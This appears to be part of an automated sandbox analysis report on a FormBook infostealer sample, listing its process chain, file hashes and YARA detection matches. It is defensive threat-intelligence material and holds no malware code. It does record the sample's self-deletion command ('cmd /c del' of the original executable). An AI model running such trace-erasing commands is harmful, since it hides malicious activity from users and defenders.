                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      Analysis Process: SX365783909782021.exe PID: 5472 Parent PID: 4092

                                                                                      General

                                                                                      Start time:13:16:06
                                                                                      Start date:11/06/2021
                                                                                      Path:C:\Users\user\Desktop\SX365783909782021.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\SX365783909782021.exe'
                                                                                      Imagebase:0x400000
                                                                                      File size:245880 bytes
                                                                                      MD5 hash:EE1F4A07B874AA6BA18D6AA0F83252D3
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.258574044.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.209804420.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.258786803.00000000005B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.258837957.0000000000710000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      Analysis Process: explorer.exe PID: 3388 Parent PID: 5472

                                                                                      General

                                                                                      Start time:13:16:10
                                                                                      Start date:11/06/2021
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:
                                                                                      Imagebase:0x7ff714890000
                                                                                      File size:3933184 bytes
                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: help.exe PID: 5524 Parent PID: 3388

                                                                                      General

                                                                                      Start time:13:16:28
                                                                                      Start date:11/06/2021
                                                                                      Path:C:\Windows\SysWOW64\help.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\help.exe
                                                                                      Imagebase:0xbb0000
                                                                                      File size:10240 bytes
                                                                                      MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.473754310.0000000003200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.472090660.0000000000C30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:moderate

                                                                                      Analysis Process: cmd.exe PID: 6124 Parent PID: 5524

                                                                                      General

                                                                                      Start time:13:16:32
                                                                                      Start date:11/06/2021
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:/c del 'C:\Users\user\Desktop\SX365783909782021.exe'
                                                                                      Imagebase:0x200000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: conhost.exe PID: 4720 Parent PID: 6124

                                                                                      General

                                                                                      Start time:13:16:33
                                                                                      Start date:11/06/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6b2800000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >